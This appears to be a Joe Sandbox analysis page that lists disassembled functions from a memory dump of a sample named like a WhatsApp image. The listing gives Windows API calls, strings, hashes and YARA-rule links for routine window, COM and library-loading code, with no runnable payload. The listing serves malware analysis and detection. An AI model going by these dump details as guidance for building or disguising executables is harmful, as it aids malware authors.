Instruction ID: f3b0cf0456233faf8748b79c0257e33ec1261a2e002a91aa3b16221b5cc352ae
Opcode Fuzzy Hash: 9e89cfa31ecb0436481db46724d154203720805632dacba740dd8989cdd69717
Instruction Fuzzy Hash: E7218D32610218AFDF118F94CC82FEA3BB9EF4D754F110254FA55BB191D6B5B8918B90

Function 000EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000EA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000EA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000EA956

Strings

msctls_updown32, xrefs: 000EA8BB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 91239a9fc800ffaef5660c8e60c7b51539b5c7be405b677bd49ad0e22f01e603
Instruction ID: f1f72ea511b09ab72d02a93b70f0c2aac404a33a4a6127a65bff30afd9d72183
Opcode Fuzzy Hash: 91239a9fc800ffaef5660c8e60c7b51539b5c7be405b677bd49ad0e22f01e603
Instruction Fuzzy Hash: 2C21ACB5600249AFDB11DF69DC81DB737ADEB4A3A4B050059FA04AB2A2CB71EC518B61

Function 000E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000E9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000E9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000E9A65

Strings

Listbox, xrefs: 000E99FD

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 06a60ebd085a15583fd9db5500d3230b6766ecf22053e7f3a7712c6ef614e669
Instruction ID: c3e45ae9985734f8d3a516141da3ae063c2e22cbe9deb446a67412e8a0b5d06c
Opcode Fuzzy Hash: 06a60ebd085a15583fd9db5500d3230b6766ecf22053e7f3a7712c6ef614e669
Instruction Fuzzy Hash: 6821D432610158BFDF218F55DC85FBF3BAAEF89750F018129F954AB1A1C6719C5187A0

Function 000EA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000EA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000EA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000EA48F

Strings

msctls_trackbar32, xrefs: 000EA444

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 899f7909ef9aa2135f7656bdd244d735ca755b1d39eac752b6c4891bf2293f83
Instruction ID: fe72f3911b1c985227c30a9d51fb176cd36d515b5c18fa668c8d415c9b1c5d5a
Opcode Fuzzy Hash: 899f7909ef9aa2135f7656bdd244d735ca755b1d39eac752b6c4891bf2293f83
Instruction Fuzzy Hash: 6511E3B1240248BEEF205F65CC49FEB3BA9EFC9754F024118FA45A60E1D2B2E851DB20

Function 000A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000A2350,?), ref: 000A22A1
GetProcAddress.KERNEL32(00000000), ref: 000A22A8

Strings

combase.dll, xrefs: 000A229C
RoInitialize, xrefs: 000A2290

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 30b53cdacf639d4b1a68803df6518f69922ce1204d99fd8c25fec40141634528
Instruction ID: 4d6bb7c85df11f615653fd6fb772d8d6e217fc5ef95a89a1195e75f18a427a69
Opcode Fuzzy Hash: 30b53cdacf639d4b1a68803df6518f69922ce1204d99fd8c25fec40141634528
Instruction Fuzzy Hash: F2E01A746A0300ABEB615FB5ED49B1437A4AB0AB02F404020B282D68F0CBF480C0CF04

Function 000A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000A2276), ref: 000A2376
GetProcAddress.KERNEL32(00000000), ref: 000A237D

Strings

RoUninitialize, xrefs: 000A2365
combase.dll, xrefs: 000A2371

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
Instruction ID: 8f851de7c4cb42bcfcd8349b810af0cbba209d3f03c6cf387fa04f1591ab1a87
Opcode Fuzzy Hash: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
Instruction Fuzzy Hash: 4DE0BF745843009BDB615FA1FD0DB043A65B71AB05F110434F289D28F0CBF595C08A14

Function 000FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000FAC60
__swprintf.LIBCMT ref: 000FAC94

Strings

WIN_XPe, xrefs: 000FACD3
%.3d, xrefs: 000FAC6E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 7c25e38451d483f9672208b7519f318d2967c8e971e344b1b9689d9da974d1b6
Instruction ID: 2ef61f2c2e405ec43e81500109d5ce8bd0b5c60e94518af7c7f976f9e21f369c
Opcode Fuzzy Hash: 7c25e38451d483f9672208b7519f318d2967c8e971e344b1b9689d9da974d1b6
Instruction Fuzzy Hash: 4EE012F190461CDBCB219790DD05DFE737CA705741F100092FA4EA1800D7359B84BA62

Function 000E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000E21FB,?,000E23EF), ref: 000E2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 000E2225

Strings

GetProcessId, xrefs: 000E221F
kernel32.dll, xrefs: 000E220E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: b89662217be85b59fd09c0f5f08b8f776942ff3c837ad315dda4c149a48b1c53
Instruction ID: 7641a24aba163c6aeac669da94eeb3ca9c7efd864efc6403ece66ff8ad814ea5
Opcode Fuzzy Hash: b89662217be85b59fd09c0f5f08b8f776942ff3c837ad315dda4c149a48b1c53
Instruction Fuzzy Hash: 9DD0C775900716EFD7615F75F80964176D9EB09715F10442DE995F2560DBB0D8C08660

Function 000842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,000842EC,?,000842AA,?), ref: 00084304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00084316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00084310
kernel32.dll, xrefs: 000842FF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
Instruction ID: c5c472e2e7043be2dc664ab60ee84d9ad19617fde025fd692e6741d1192183ff
Opcode Fuzzy Hash: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
Instruction Fuzzy Hash: 22D0A930800B13AFC7206FA0F80D602B6E8BB08302F00842AF8D2D2660EBF0C8C08B60

Function 0008434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,000841BB,00084341,?,0008422F,?,000841BB,?,?,?,?,000839FE,?,00000001), ref: 00084359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0008436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00084365
kernel32.dll, xrefs: 00084354

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
Instruction ID: 3d09a1835b6140c1bab97a8ac276ea43080205741f067297fd777c2e763ddbea
Opcode Fuzzy Hash: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
Instruction Fuzzy Hash: 19D0A7704007139FC7206FB0F80960176D4BB14715F004439E4D1D2550DBF0D8C08750

Function 000C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,000C051D,?,000C05FE), ref: 000C0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000C0559

Strings

oleaut32.dll, xrefs: 000C0542
RegisterTypeLibForUser, xrefs: 000C0553

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
Instruction ID: 56717620924b3b27b9c8ef9486197e6c4c0dbf8baa750ead29f684e245fcb2f2
Opcode Fuzzy Hash: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
Instruction Fuzzy Hash: FAD0C770544B12DFD7609F65F809B46B6E8AB14711F50C41DF596D2650DBB0CCC0CA50

Function 000C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000C052F,?,000C06D7), ref: 000C0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000C0584

Strings

UnRegisterTypeLibForUser, xrefs: 000C057E
oleaut32.dll, xrefs: 000C056D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
Instruction ID: be2ffe418c63c62a58409fee88c88fe44ef3e0802101c2527e6750e2f804c5ae
Opcode Fuzzy Hash: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
Instruction Fuzzy Hash: F5D0C770544712DFDB606F75F809F47B7E8AB04711F10C51DE895D2590DBB0D8C0CA60

Function 000DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000DECBE,?,000DEBBB), ref: 000DECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000DECE8

Strings

GetSystemWow64DirectoryW, xrefs: 000DECE2
kernel32.dll, xrefs: 000DECD1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 75fa9af46ab78e14905f0d0e4773a7a6a55f10774f291ea2c657edeaade70361
Instruction ID: c24ee258878b4d5fb177a2a93f034aeb13d9cbfb405af88fe745929e7e8b7c72
Opcode Fuzzy Hash: 75fa9af46ab78e14905f0d0e4773a7a6a55f10774f291ea2c657edeaade70361
Instruction Fuzzy Hash: 64D0A930810723AFCB207FA0F849602BAF8AF05300F00842AF886D2650EFB0D8C08A60

Function 000DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,000DBAD3,00000001,000DB6EE,?,0011DC00), ref: 000DBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 000DBAFD

Strings

GetModuleHandleExW, xrefs: 000DBAF7
kernel32.dll, xrefs: 000DBAE6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
Instruction ID: b50b332ccc64cf9fe33d8560fc4e5212e2e3111ae0185f3a0a4283fadd977b7f
Opcode Fuzzy Hash: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
Instruction Fuzzy Hash: 80D0A930900712DFC7307FA0F84AB56B6E8AB06320F01842BE883D2650EBF0D8C0CA60

Function 000E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,000E3BD1,?,000E3E06), ref: 000E3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000E3BFB

Strings

advapi32.dll, xrefs: 000E3BE4
RegDeleteKeyExW, xrefs: 000E3BF5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 49ee92cb27952dd958c54c7b38a669cb4b828613466539a397f824688cae04a8
Instruction ID: bc52097e6ba61d950cde6b3815e1959c8432f9251185e81cf91aaf82c86d527a
Opcode Fuzzy Hash: 49ee92cb27952dd958c54c7b38a669cb4b828613466539a397f824688cae04a8
Instruction Fuzzy Hash: C9D09EB4500752DFD7645FA6A809642BEE4AB05715F204419E495A2550DBB0D8808F50

Function 000B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49518edea98363e7b011529c0c1093d28c273c14a1ae1e5cf8395a7c80e79596
Instruction ID: 20e27ec45f249da9255b51d3593bbe51a4682428ca730fe2733496ebabbf42f0
Opcode Fuzzy Hash: 49518edea98363e7b011529c0c1093d28c273c14a1ae1e5cf8395a7c80e79596
Instruction Fuzzy Hash: 37C13B75A0021AEFDB14DF94C884AEEBBB5FF48700F108598EA15EB251D771EE41DBA0

Function 000DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000DAAB4
CoUninitialize.OLE32 ref: 000DAABF

Part of subcall function 000C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B

VariantInit.OLEAUT32(?), ref: 000DAACA
VariantClear.OLEAUT32(?), ref: 000DAD9D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 55c6e4052df28a667a8467e55fb2154ee988983cbae871e16726827337db3601
Instruction ID: 25a9d5128b2189ccedd14040c56a14290901589e7ef88151229cf39504857b56
Opcode Fuzzy Hash: 55c6e4052df28a667a8467e55fb2154ee988983cbae871e16726827337db3601
Instruction Fuzzy Hash: 32A12575304701AFCB11EF14C881B6AB7E5BF99720F14844AF9969B3A2CB30ED41DB96

Function 000B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000B91DD
SysAllocString.OLEAUT32(?), ref: 000B9286
VariantCopy.OLEAUT32 ref: 000B92B5
VariantClear.OLEAUT32(?), ref: 000B92DC

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: ec4930c6234335cc4c36e578d8b5b2cd854228901229dbc96c6adaef6ea35e47
Instruction ID: fde823ed2352525e54eee027d6f20cb1eadf06532305b8418aa6ae1a660d3400
Opcode Fuzzy Hash: ec4930c6234335cc4c36e578d8b5b2cd854228901229dbc96c6adaef6ea35e47
Instruction Fuzzy Hash: B251A330A04706ABDB74AF65D891BEEB3E5EF45710F20881FE786DB2D2DB7099808715

Function 000EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00F36AF0,?), ref: 000EC544
ScreenToClient.USER32(?,00000002), ref: 000EC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 000EC5DA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
